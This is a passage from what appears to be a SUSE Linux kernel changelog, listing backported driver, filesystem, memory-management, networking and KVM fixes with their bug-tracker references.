ftrace: Fix kmemleak in unregister_ftrace_graph (bnc#1012382).\n - ftrace: Fix memleak when unregistering dynamic ops when tracing disabled\n (bnc#1012382).\n - ftrace: Fix selftest goto location on error (bnc#1012382).\n - genirq: Fix for_each_action_of_desc() macro (bsc#1061064).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - gfs2: Do not clear SGID when inheriting ACLs (bsc#1012829).\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n - gfs2: Fix reference to ERR_PTR in gfs2_glock_iter_next (bnc#1012382).\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n - hid: i2c-hid: allocate hid buffers for real worst case (bnc#1012382).\n - Hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - hwmon: (gl520sm) Fix overflows and crash seen when writing into limit\n attributes (bnc#1012382).\n - i2c: designware: Add ACPI HID for Hisilicon Hip07/08 I2C controller\n (bsc#1049291).\n - i2c: designware: Convert to use unified device property API\n (bsc#1049291).\n - i2c: meson: fix wrong variable usage in meson_i2c_put_data (bnc#1012382).\n - i2c: xgene: Set ACPI_COMPANION_I2C (bsc#1053633).\n - i2c: xgene-slimpro: Add ACPI support by using PCC mailbox (bsc#1053633).\n - i2c: xgene-slimpro: include linux/io.h for memremap (bsc#1053633).\n - i2c: xgene-slimpro: Use a single function to send command message\n (bsc#1053633).\n - i40e/i40evf: fix out-of-bounds read of cpumask (bsc#1053685).\n - i40e: Initialize 64-bit statistics TX ring seqcount (bsc#1024346\n FATE#321239 bsc#1024373 FATE#321247).\n - i40iw: Add missing memory barriers (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - i40iw: Fix port number for query QP (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - ib/core: Add generic function to extract IB speed from netdev\n (bsc#1056596).\n - ib/core: Add ordered workqueue for RoCE GID management (bsc#1056596).\n - ib/core: Fix for core panic (bsc#1022595 FATE#322350).\n - ib/core: Fix the validations 
of a multicast LID in attach or detach\n operations (bsc#1022595 FATE#322350).\n - ib/hns: checking for IS_ERR() instead of NULL (bsc#1056849).\n - ib/i40iw: Fix error code in i40iw_create_cq() (bsc#969476 FATE#319648\n bsc#969477 FATE#319816).\n - ib/ipoib: Fix deadlock over vlan_mutex (bnc#1012382 bsc#1022595\n FATE#322350).\n - ib/ipoib: Replace list_del of the neigh->list with list_del_init\n (FATE#322350 bnc#1012382 bsc#1022595).\n - ib/ipoib: rtnl_unlock can not come after free_netdev (FATE#322350\n bnc#1012382 bsc#1022595).\n - ib/mlx5: Change logic for dispatching IB events for port state\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n - ib/mlx5: Fix cached MR allocation flow (bsc#1015342 FATE#321688\n bsc#1015343 FATE#321689).\n - ib/mlx5: Fix Raw Packet QP event handler assignment (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - ibmvnic: Clean up resources on probe failure (fate#323285, bsc#1058116).\n - ibmvnic: Set state UP (bsc#1062962).\n - ib/qib: fix false-postive maybe-uninitialized warning (FATE#321231\n FATE#321473 FATE#322149 FATE#322153 bnc#1012382).\n - ib/rxe: Add dst_clone() in prepare_ipv6_hdr() (bsc#1049361).\n - ib/rxe: Avoid ICRC errors by copying into the skb first (bsc#1049361).\n - ib/rxe: Disable completion upcalls when a CQ is destroyed (bsc#1049361).\n - ib/rxe: Fix destination cache for IPv6 (bsc#1049361).\n - ib/rxe: Fix up rxe_qp_cleanup() (bsc#1049361).\n - ib/rxe: Fix up the responder's find_resources() function (bsc#1049361).\n - ib/rxe: Handle NETDEV_CHANGE events (bsc#1049361).\n - ib/rxe: Move refcounting earlier in rxe_send() (bsc#1049361).\n - ib/rxe: Remove dangling prototype (bsc#1049361).\n - ib/rxe: Remove unneeded initialization in prepare6() (bsc#1049361).\n - ib/rxe: Set dma_mask and coherent_dma_mask (bsc#1049361).\n - igb: re-assign hw address pointer on reset after PCI error (bnc#1012382).\n - iio: ad7793: Fix the serial interface reset (bnc#1012382).\n - iio: adc: axp288: Drop bogus 
AXP288_ADC_TS_PIN_CTRL register\n modifications (bnc#1012382).\n - iio: adc: hx711: Add DT binding for avia,hx711 (bnc#1012382).\n - iio: adc: mcp320x: Fix oops on module unload (bnc#1012382).\n - iio: adc: mcp320x: Fix readout of negative voltages (bnc#1012382).\n - iio: adc: twl4030: Disable the vusb3v1 rugulator in the error handling\n path of 'twl4030_madc_probe()' (bnc#1012382).\n - iio: adc: twl4030: Fix an error handling path in 'twl4030_madc_probe()'\n (bnc#1012382).\n - iio: ad_sigma_delta: Implement a dedicated reset function (bnc#1012382).\n - iio: core: Return error for failed read_reg (bnc#1012382).\n - input: i8042 - add Gigabyte P57 to the keyboard reset table\n (bnc#1012382).\n - iommu/arm-smmu-v3, acpi: Add temporary Cavium SMMU-V3 IORT model number\n definitions (bsc#1036060).\n - iommu/arm-smmu-v3: Increase CMDQ drain timeout value (bsc#1035479).\n Refresh patch to mainline version\n - iommu/io-pgtable-arm: Check for leaf entry before dereferencing it\n (bnc#1012382).\n - iommu/vt-d: Avoid calling virt_to_phys() on null pointer (bsc#1061067).\n - ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt()\n (bnc#1012382).\n - ipv6: add rcu grace period before freeing fib6_node (bnc#1012382).\n - ipv6: fix memory leak with multiple tables during netns destruction\n (bnc#1012382).\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n - irqchip/gic-v3-its: Fix command buffer allocation (bsc#1057067).\n - iscsi-target: fix invalid flags in text response (bsc#1052095).\n - iw_cxgb4: put ep reference in pass_accept_req() (FATE#321658 bsc#1005778\n FATE#321660 bsc#1005780 FATE#321661 bsc#1005781).\n - iwlwifi: add workaround to disable wide channels in 5GHz (bnc#1012382).\n - iwlwifi: mvm: do not send CTDP commands via debugfs if not supported\n (bsc#1031717).\n - kabi: arm64: compatibility workaround for lse atomics (bsc#1055290).\n - kabi fix drivers/nvme/target/nvmet.h (bsc#1058550).\n - KABI 
fixup struct nvmet_sq (bsc#1063349).\n - kABI: protect enum fs_flow_table_type (bsc#1015342 FATE#321688\n bsc#1015343 FATE#321689).\n - kABI: protect enum pid_type (kabi).\n - kABI: protect struct iscsi_np (kabi).\n - kABI: protect struct mlx5_priv (bsc#1015342 FATE#321688 bsc#1015343\n FATE#321689).\n - kABI: protect struct rm_data_op (kabi).\n - kABI: protect struct sdio_func (kabi).\n - kabi/severities: add fs/ceph to kabi severities (bsc#1048228).\n - kabi/severities: Ignore drivers/scsi/cxgbi (bsc#1052094)\n - kabi/severities: Ignore kABI changes due to last patchset (bnc#1053472)\n - kabi/severities: ignore nfs_pgio_data_destroy\n - kABI: uninline task_tgid_nr_nr (kabi).\n - kABI: Workaround kABI breakage of AMD-AVIC fixes (bsc#1044503).\n - kernel/*: switch to memdup_user_nul() (bsc#1048893).\n - kernel/sysctl_binary.c: check name array length in\n deprecated_sysctl_warning() (FATE#323821).\n - keys: fix writing past end of user-supplied buffer in keyring_read()\n (bnc#1012382).\n - keys: prevent creating a different user's keyrings (bnc#1012382).\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n - kvm: Add struct kvm_vcpu pointer parameter to get_enable_apicv()\n (bsc#1044503).\n - kvm: arm64: Restore host physical timer access on hyp_panic()\n (bsc#1054082).\n - kvm: arm/arm64: Fix bug in advertising KVM_CAP_MSI_DEVID capability\n (bsc#1054082).\n - kvm: async_pf: Fix #DF due to inject "Page not Present" and "Page Ready"\n exceptions simultaneously (bsc#1061017).\n - kvm, pkeys: do not use PKRU value in vcpu->arch.guest_fpu.state\n (bsc#1055935).\n - kvm: PPC: Book3S: Fix race and leak in kvm_vm_ioctl_create_spapr_tce()\n (bnc#1012382).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - kvm: SVM: Add irqchip_split() checks before enabling AVIC (bsc#1044503).\n - kvm: SVM: delete avic_vm_id_bitmap (2 megabyte static array)\n (bsc#1059500).\n - kvm: SVM: Refactor AVIC vcpu initialization into avic_init_vcpu()\n (bsc#1044503).\n - 
kvm: VMX: do not change SN bit in vmx_update_pi_irte() (bsc#1061017).\n - kvm: VMX: remove WARN_ON_ONCE in kvm_vcpu_trigger_posted_interrupt\n (bsc#1061017).\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n - kvm: x86: block guest protection keys unless the host has them enabled\n (bsc#1055935).\n - kvm: x86: kABI workaround for PKRU fixes (bsc#1055935).\n - kvm: x86: simplify handling of PKRU (bsc#1055935).\n - libata: transport: Remove circular dependency at free time (bnc#1012382).\n - libceph: abort already submitted but abortable requests when map or pool\n goes full (bsc#1048228).\n - libceph: add an epoch_barrier field to struct ceph_osd_client\n (bsc#1048228).\n - libceph: advertise support for NEW_OSDOP_ENCODING and SERVER_LUMINOUS\n (bsc#1048228).\n - libceph: advertise support for OSD_POOLRESEND (bsc#1048228).\n - libceph: allow requests to return immediately on full conditions if\n caller wishes (bsc#1048228).\n - libceph: always populate t->target_{oid,oloc} in calc_target()\n (bsc#1048228).\n - libceph: always signal completion when done (bsc#1048228).\n - libceph: apply_upmap() (bsc#1048228).\n - libceph: avoid unnecessary pi lookups in calc_target() (bsc#1048228).\n - libceph: ceph_connection_operations::reencode_message() method\n (bsc#1048228).\n - libceph: ceph_decode_skip_* helpers (bsc#1048228).\n - libceph: compute actual pgid in ceph_pg_to_up_acting_osds()\n (bsc#1048228).\n - libceph, crush: per-pool crush_choose_arg_map for crush_do_rule()\n (bsc#1048228).\n - libceph: delete from need_resend_linger before check_linger_pool_dne()\n (bsc#1048228).\n - libceph: do not allow bidirectional swap of pg-upmap-items (bsc#1061451).\n - libceph: do not call encode_request_finish() on MOSDBackoff messages\n (bsc#1048228).\n - libceph: do not call ->reencode_message() more than once per message\n (bsc#1048228).\n - libceph: do not pass pgid by value (bsc#1048228).\n - libceph: drop need_resend from calc_target() (bsc#1048228).\n - libceph: 
encode_{pgid,oloc}() helpers (bsc#1048228).\n - libceph: fallback for when there isn't a pool-specific choose_arg\n (bsc#1048228).\n - libceph: fix old style declaration warnings (bsc#1048228).\n - libceph: foldreq->last_force_resend into ceph_osd_request_target\n (bsc#1048228).\n - libceph: get rid of ack vs commit (bsc#1048228).\n - libceph: handle non-empty dest in ceph_{oloc,oid}_copy() (bsc#1048228).\n - libceph: initialize last_linger_id with a large integer (bsc#1048228).\n - libceph: introduce and switch to decode_pg_mapping() (bsc#1048228).\n - libceph: introduce ceph_spg, ceph_pg_to_primary_shard() (bsc#1048228).\n - libceph: kill __{insert,lookup,remove}_pg_mapping() (bsc#1048228).\n - libceph: make DEFINE_RB_* helpers more general (bsc#1048228).\n - libceph: make encode_request_*() work with r_mempool requests\n (bsc#1048228).\n - libceph: make RECOVERY_DELETES feature create a new interval\n (bsc#1048228).\n - libceph: make sure need_resend targets reflect latest map (bsc#1048228).\n - libceph: MOSDOp v8 encoding (actual spgid + full hash) (bsc#1048228).\n - libceph: new features macros (bsc#1048228).\n - libceph: new pi->last_force_request_resend (bsc#1048228).\n - libceph: NULL deref on osdmap_apply_incremental() error path\n (bsc#1048228).\n - libceph: osd_request_timeout option (bsc#1048228).\n - libceph: osd_state is 32 bits wide in luminous (bsc#1048228).\n - libceph: pg_upmap[_items] infrastructure (bsc#1048228).\n - libceph: pool deletion detection (bsc#1048228).\n - libceph: potential NULL dereference in ceph_msg_data_create()\n (bsc#1048228).\n - libceph: remove ceph_sanitize_features() workaround (bsc#1048228).\n - libceph: remove now unused finish_request() wrapper (bsc#1048228).\n - libceph: remove req->r_replay_version (bsc#1048228).\n - libceph: resend on PG splits if OSD has RESEND_ON_SPLIT (bsc#1048228).\n - libceph: respect RADOS_BACKOFF backoffs (bsc#1048228).\n - libceph: set -EINVAL in one place in crush_decode() (bsc#1048228).\n - 
libceph: support SERVER_JEWEL feature bits (bsc#1048228).\n - libceph: take osdc->lock in osdmap_show() and dump flags in hex\n (bsc#1048228).\n - libceph: upmap semantic changes (bsc#1048228).\n - libceph: use alloc_pg_mapping() in __decode_pg_upmap_items()\n (bsc#1048228).\n - libceph: use target pi for calc_target() calculations (bsc#1048228).\n - lib: test_rhashtable: fix for large entry counts (bsc#1055359).\n - lib: test_rhashtable: Fix KASAN warning (bsc#1055359).\n - lightnvm: remove unused rq parameter of nvme_nvm_rqtocmd() to kill\n warning (FATE#319466).\n - locking/rwsem: Fix down_write_killable() for\n CONFIG_RWSEM_GENERIC_SPINLOCK=y (bsc#969756).\n - locking/rwsem-spinlock: Fix EINTR branch in __down_write_common()\n (bsc#969756).\n - lpfc: Add Buffer to Buffer credit recovery support (bsc#1052384).\n - lpfc: convert info messages to standard messages (bsc#1052384).\n - lpfc: Correct issues with FAWWN and FDISCs (bsc#1052384).\n - lpfc: Correct return error codes to align with nvme_fc transport\n (bsc#1052384).\n - lpfc: Fix bad sgl reposting after 2nd adapter reset (bsc#1052384).\n - lpfc: Fix crash in lpfc nvmet when fc port is reset (bsc#1052384).\n - lpfc: Fix duplicate NVME rport entries and namespaces (bsc#1052384).\n - lpfc: Fix handling of FCP and NVME FC4 types in Pt2Pt topology\n (bsc#1052384).\n - lpfc: fix "integer constant too large" error on 32bit archs\n (bsc#1052384).\n - lpfc: Fix loop mode target discovery (bsc#1052384).\n - lpfc: Fix MRQ > 1 context list handling (bsc#1052384).\n - lpfc: Fix NVME PRLI handling during RSCN (bsc#1052384).\n - lpfc: Fix nvme target failure after 2nd adapter reset (bsc#1052384).\n - lpfc: Fix oops when NVME Target is discovered in a nonNVME environment\n (bsc#1052384).\n - lpfc: Fix plogi collision that causes illegal state transition\n (bsc#1052384).\n - lpfc: Fix rediscovery on switch blade pull (bsc#1052384).\n - lpfc: Fix relative offset error on large nvmet target ios (bsc#1052384).\n - lpfc: fixup 
crash during storage failover operations (bsc#1042847).\n - lpfc: Limit amount of work processed in IRQ (bsc#1052384).\n - lpfc: lpfc version bump 11.4.0.3 (bsc#1052384).\n - lpfc: remove console log clutter (bsc#1052384).\n - lpfc: support nvmet_fc defer_rcv callback (bsc#1052384).\n - lsm: fix smack_inode_removexattr and xattr_getsecurity memleak\n (bnc#1012382).\n - mac80211: flush hw_roc_start work before cancelling the ROC\n (bnc#1012382).\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061172).\n - md/raid10: submit bio directly to replacement disk (bnc#1012382).\n - md/raid5: fix a race condition in stripe batch (linux-stable).\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in break_stripe_batch_list\n (bnc#1012382).\n - md/raid5: release/flush io in raid5_do_work() (bnc#1012382).\n - media: uvcvideo: Prevent heap overflow when accessing mapped controls\n (bnc#1012382).\n - media: v4l2-compat-ioctl32: Fix timespec conversion (bnc#1012382).\n - megaraid_sas: Fix probing cards without io port (bsc#1053681).\n - mips: Ensure bss section ends on a long-aligned address (bnc#1012382).\n - mips: Fix minimum alignment requirement of IRQ stack (git-fixes).\n - mips: IRQ Stack: Unwind IRQ stack onto task stack (bnc#1012382).\n - mips: Lantiq: Fix another request_mem_region() return code check\n (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both infinite inputs\n (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input values with\n opposite signs (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of both inputs zero\n (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN propagation\n (bnc#1012382).\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both inputs negative\n (bnc#1012382).\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity and zero inputs\n (bnc#1012382).\n - mips: ralink: Fix incorrect assignment on ralink_soc (bnc#1012382).\n - mlx5: Avoid that 
mlx5_ib_sg_to_klms() overflows the klms array\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n - mm: avoid marking swap cached page as lazyfree (VM Functionality,\n bsc#1061775).\n - mm/backing-dev.c: fix an error handling path in 'cgwb_create()'\n (bnc#1063475).\n - mmc: mmc: correct the logic for setting HS400ES signal voltage\n (bsc#1054082).\n - mm,compaction: serialize waitqueue_active() checks (for real)\n (bsc#971975).\n - mmc: sdhci-xenon: add set_power callback (bsc#1057035).\n - mmc: sdhci-xenon: Fix the work flow in xenon_remove() (bsc#1057035).\n - mmc: sdio: fix alignment issue in struct sdio_func (bnc#1012382).\n - mm: discard memblock data later (bnc#1063460).\n - mm: fix data corruption caused by lazyfree page (VM Functionality,\n bsc#1061775).\n - mm, madvise: ensure poisoned pages are removed from per-cpu lists (VM hw\n poison -- git fixes).\n - mm/memblock.c: reversed logic in memblock_discard() (bnc#1063460).\n - mm: meminit: mark init_reserved_page as __meminit (bnc#1063509).\n - mm/memory_hotplug: change pfn_to_section_nr/section_nr_to_pfn macro to\n inline function (bnc#1063501).\n - mm/memory_hotplug: define find_{smallest|biggest}_section_pfn as\n unsigned long (bnc#1063520).\n - mm/page_alloc.c: apply gfp_allowed_mask before the first allocation\n attempt (bnc#971975 VM -- git fixes).\n - mm: prevent double decrease of nr_reserved_highatomic (bnc#1012382).\n - mm/vmalloc.c: huge-vmap: fail gracefully on unexpected huge vmap\n mappings (bsc#1046529).\n - mptsas: Fixup device hotplug for VMWare ESXi (bsc#1030850).\n - net: core: Prevent from dereferencing null pointer when releasing SKB\n (bnc#1012382).\n - net: ethernet: hip04: Call SET_NETDEV_DEV() (bsc#1049336).\n - netfilter: fix IS_ERR_VALUE usage (bsc#1052888).\n - netfilter: invoke synchronize_rcu after set the _hook_ to NULL\n (bnc#1012382).\n - netfilter: nfnl_cthelper: fix incorrect helper->expect_class_max\n (bnc#1012382).\n - netfilter: x_tables: pack percpu counter 
allocations (bsc#1052888).\n - netfilter: x_tables: pass xt_counters struct instead of packet counter\n (bsc#1052888).\n - netfilter: x_tables: pass xt_counters struct to counter allocator\n (bsc#1052888).\n - net: hns: add acpi function of xge led control (bsc#1049336).\n - net: hns: Fix a skb used after free bug (bsc#1049336).\n - net/mlx4_core: Enable 4K UAR if SRIOV module parameter is not enabled\n (bsc#966191 FATE#320230 bsc#966186 FATE#320228).\n - net/mlx5: Check device capability for maximum flow counters (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5: Delay events till ib registration ends (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Check for qos capability in dcbnl_initialize (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Do not add/remove 802.1ad rules when changing 802.1Q VLAN\n filter (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Fix calculated checksum offloads counters (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Fix dangling page pointer on DMA mapping error (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Fix DCB_CAP_ATTR_DCBX capability for DCBNL getcap\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Fix inline header size for small packets (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Print netdev features correctly in error message (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Schedule overflow check work to mlx5e workqueue (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net/mlx5: E-Switch, Unload the representors in the correct order\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5: Fix arm SRQ command for ISSI version 0 (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5: Fix command completion after timeout access invalid structure\n (bsc#966318 FATE#320158 bsc#966316 FATE#320159).\n - net/mlx5: Fix counter list 
hardware structure (bsc#1015342 FATE#321688\n bsc#1015343 FATE#321689).\n - net/mlx5: Remove the flag MLX5_INTERFACE_STATE_SHUTDOWN (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net/mlx5: Skip mlx5_unload_one if mlx5_load_one fails (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net: mvpp2: fix the mac address used when using PPv2.2 (bsc#1032150).\n - net: mvpp2: use {get, put}_cpu() instead of smp_processor_id()\n (bsc#1032150).\n - net/packet: check length in getsockopt() called with PACKET_HDRLEN\n (bnc#1012382).\n - net: phy: Fix lack of reference count on PHY driver (bsc#1049336).\n - net: phy: Fix PHY module checks and NULL deref in phy_attach_direct()\n (bsc#1049336).\n - netvsc: Initialize 64-bit stats seqcount (fate#320485).\n - new helper: memdup_user_nul() (bsc#1048893).\n - nfsd: Fix general protection fault in release_lock_stateid()\n (bnc#1012382).\n - nfs: flush data when locking a file to ensure cache coherence for mmap\n (bsc#981309).\n - nvme: allow timed-out ios to retry (bsc#1063349).\n - nvme-fabrics: generate spec-compliant UUID NQNs (bsc#1057498).\n - nvme-fc: address target disconnect race conditions in fcp io submit\n (bsc#1052384).\n - nvme-fc: do not override opts->nr_io_queues (bsc#1052384).\n - nvme-fc: kABI fix for defer_rcv() callback (bsc#1052384).\n - nvme_fc/nvmet_fc: revise Create Association descriptor length\n (bsc#1052384).\n - nvme_fc: Reattach to localports on re-registration (bsc#1052384).\n - nvme-fc: revise TRADDR parsing (bsc#1052384).\n - nvme-fc: update tagset nr_hw_queues after queues reinit (bsc#1052384).\n - nvme-fc: use blk_mq_delay_run_hw_queue instead of open-coding it\n (bsc#1052384).\n - nvme: fix hostid parsing (bsc#1049272).\n - nvme: fix sqhd reference when admin queue connect fails (bsc#1063349).\n - nvme: fix visibility of "uuid" ns attribute (bsc#1060400).\n - nvme-loop: update tagset nr_hw_queues after reconnecting/resetting\n (bsc#1052384).\n - nvme: protect against simultaneous shutdown 
invocations (FATE#319965\n bnc#1012382 bsc#964944).\n - nvme-rdma: update tagset nr_hw_queues after reconnecting/resetting\n (bsc#1052384).\n - nvme: stop aer posting if controller state not live (bsc#1063349).\n - nvmet: avoid unneeded assignment of submit_bio return value\n (bsc#1052384).\n - nvmet_fc: Accept variable pad lengths on Create Association LS\n (bsc#1052384).\n - nvmet_fc: add defer_req callback for deferment of cmd buffer return\n (bsc#1052384).\n - nvmet-fc: correct use after free on list teardown (bsc#1052384).\n - nvmet-fc: eliminate incorrect static markers on local variables\n (bsc#1052384).\n - nvmet-fc: fix byte swapping in nvmet_fc_ls_create_association\n (bsc#1052384).\n - nvmet_fc: Simplify sg list handling (bsc#1052384).\n - nvmet: implement valid sqhd values in completions (bsc#1063349).\n - nvmet: Move serial number from controller to subsystem (bsc#1058550).\n - nvmet: prefix version configfs file with attr (bsc#1052384).\n - nvmet: preserve controller serial number between reboots (bsc#1058550).\n - nvmet: synchronize sqhd update (bsc#1063349).\n - nvme: use device_add_disk_with_groups() (bsc#1060400).\n - of: fix "/cpus" reference leak in of_numa_parse_cpu_nodes()\n (bsc#1056827).\n - ovl: fix dentry leak for default_permissions (bsc#1054084).\n - parisc: perf: Fix potential NULL pointer dereference (bnc#1012382).\n - partitions/efi: Fix integer overflow in GPT size calculation\n (FATE#322379 bnc#1012382 bsc#1020989).\n - pci: Allow PCI express root ports to find themselves (bsc#1061046).\n - pci: fix oops when try to find Root Port for a PCI device (bsc#1061046).\n - pci: Fix race condition with driver_override (bnc#1012382).\n - pci: Mark AMD Stoney GPU ATS as broken (bsc#1061046).\n - pci: rockchip: Handle regulator_get_current_limit() failure correctly\n (bsc#1056849).\n - pci: rockchip: Use normal register bank for config accessors\n (bsc#1056849).\n - pci: shpchp: Enable bridge bus mastering if MSI is enabled (bnc#1012382).\n - 
percpu_ref: allow operation mode switching operations to be called\n concurrently (bsc#1055096).\n - percpu_ref: remove unnecessary RCU grace period for staggered atomic\n switching confirmation (bsc#1055096).\n - percpu_ref: reorganize __percpu_ref_switch_to_atomic() and relocate\n percpu_ref_switch_to_atomic() (bsc#1055096).\n - percpu_ref: restructure operation mode switching (bsc#1055096).\n - percpu_ref: unify staggered atomic switching wait behavior (bsc#1055096).\n - perf: arm: acpi: remove cpu hotplug statemachine dependency\n (bsc#1062279).\n - perf: arm: platform: remove cpu hotplug statemachine dependency\n (bsc#1062279).\n - perf: arm: replace irq_get_percpu_devid_partition call (bsc#1062279).\n - perf: arm: temporary workaround for build errors (bsc#1062279).\n - perf: Convert to using %pOF instead of full_name (bsc#1062279).\n - perf/x86: Fix RDPMC vs. mm_struct tracking (bsc#1061831).\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs. mm_struct\n tracking' (bsc#1061831).\n - perf: xgene: Add APM X-Gene SoC Performance Monitoring Unit driver\n (bsc#1036737).\n - perf: xgene: Include module.h (bsc#1036737).\n - perf: xgene: Move PMU leaf functions into function pointer structure\n (bsc#1036737).\n - perf: xgene: Parse PMU subnode from the match table (bsc#1036737).\n - phy: Do not increment MDIO bus refcount unless it's a different owner\n (bsc#1049336).\n - phy: fix error case of phy_led_triggers_(un)register (bsc#1049336).\n - pm / Domains: Fix unsafe iteration over modified list of domains\n (bsc#1056849).\n - powerpc: Fix DAR reporting when alignment handler faults (bnc#1012382).\n - powerpc: Fix unused function warning 'lmb_to_memblock' (FATE#322022).\n - powerpc/perf: Cleanup of PM_BR_CMPL vs. 
PM_BRU_CMPL in Power9 event list\n (bsc#1056686, fate#321438, bsc#1047238, git-fixes 34922527a2bc).\n - powerpc/perf: Factor out PPMU_ONLY_COUNT_RUN check code from power8\n (fate#321438, bsc#1053043, git-fixes efe881afdd999).\n - powerpc/pseries: Add pseries hotplug workqueue (FATE#322022).\n - powerpc/pseries: Auto-online hotplugged memory (FATE#322022).\n - powerpc/pseries: Check memory device state before onlining/offlining\n (FATE#322022).\n - powerpc/pseries: Correct possible read beyond dlpar sysfs buffer\n (FATE#322022).\n - powerpc/pseries: Do not attempt to acquire drc during memory hot add for\n assigned lmbs (FATE#322022).\n - powerpc/pseries: Fix build break when MEMORY_HOTREMOVE=n (FATE#322022).\n - powerpc/pseries: fix memory leak in queue_hotplug_event() error path\n (FATE#322022).\n - powerpc/pseries: Fix parent_dn reference leak in add_dt_node()\n (bnc#1012382).\n - powerpc/pseries: Implement indexed-count hotplug memory add\n (FATE#322022).\n - powerpc/pseries: Implement indexed-count hotplug memory remove\n (FATE#322022).\n - powerpc/pseries: Introduce memory hotplug READD operation (FATE#322022).\n - powerpc/pseries: Make the acquire/release of the drc for memory a\n seperate step (FATE#322022).\n - powerpc/pseries: Remove call to memblock_add() (FATE#322022).\n - powerpc/pseries: Revert 'Auto-online hotplugged memory' (FATE#322022).\n - powerpc/pseries: Update affinity for memory and cpus specified in a PRRN\n event (FATE#322022).\n - powerpc/pseries: Use kernel hotplug queue for PowerVM hotplug events\n (FATE#322022).\n - powerpc/pseries: Use lmb_is_removable() to check removability\n (FATE#322022).\n - powerpc/pseries: Verify CPU does not exist before adding (FATE#322022).\n - qeth: add network device features for VLAN devices (bnc#1053472,\n LTC#157385).\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n - r8169: Add support for restarting auto-negotiation (bsc#1050742).\n - r8169:Correct the way of setting RTL8168DP ephy 
(bsc#1050742).\n - r8169:fix system hange problem (bsc#1050742).\n - r8169:Fix typo in setting RTL8168H PHY parameter (bsc#1050742).\n - r8169:Fix typo in setting RTL8168H PHY PFM mode (bsc#1050742).\n - r8169:Remove unnecessary phy reset for pcie nic when setting link spped\n (bsc#1050742).\n - r8169:Update the way of reading RTL8168H PHY register "rg_saw_cnt"\n (bsc#1050742).\n - rda=sRDMA: Fix the composite message user notification (bnc#1012382).\n - rdma/bnxt_re: Allocate multiple notification queues (bsc#1037579).\n - rdma/bnxt_re: Implement the alloc/get_hw_stats callback (bsc#1037579).\n - rdma: Fix return value check for ib_get_eth_speed() (bsc#1056596).\n - rdma/qedr: Parse VLAN ID correctly and ignore the value of zero\n (bsc#1019695 FATE#321703 bsc#1019699 FATE#321702 bsc#1022604\n FATE#321747).\n - rdma/qedr: Parse vlan priority as sl (bsc#1019695 FATE#321703\n bsc#1019699 FATE#321702 bsc#1022604 FATE#321747).\n - rds: ib: add error handle (bnc#1012382).\n - Remove patch\n 0407-nvme_fc-change-failure-code-on-remoteport-connectivi.patch\n (bsc#1037838)\n - Remove superfluous hunk in bigmem backport (bsc#1064436).\n - Revert "ceph: SetPageError() for writeback pages if writepages fails"\n (bsc#1048228).\n - Revert "ipv6: add rcu grace period before freeing fib6_node" (kabi).\n - Revert "ipv6: fix sparse warning on rt6i_node" (kabi).\n - Revert "net: fix percpu memory leaks" (bnc#1012382).\n - Revert "net: phy: Correctly process PHY_HALTED in phy_stop_machine()"\n (bnc#1012382).\n - Revert "net: use lib/percpu_counter API for fragmentation mem\n accounting" (bnc#1012382).\n - Revert "Update\n patches.fixes/xfs-refactor-log-record-unpack-and-data-processing.patch\n (bsc#1043598, bsc#1036215)." 
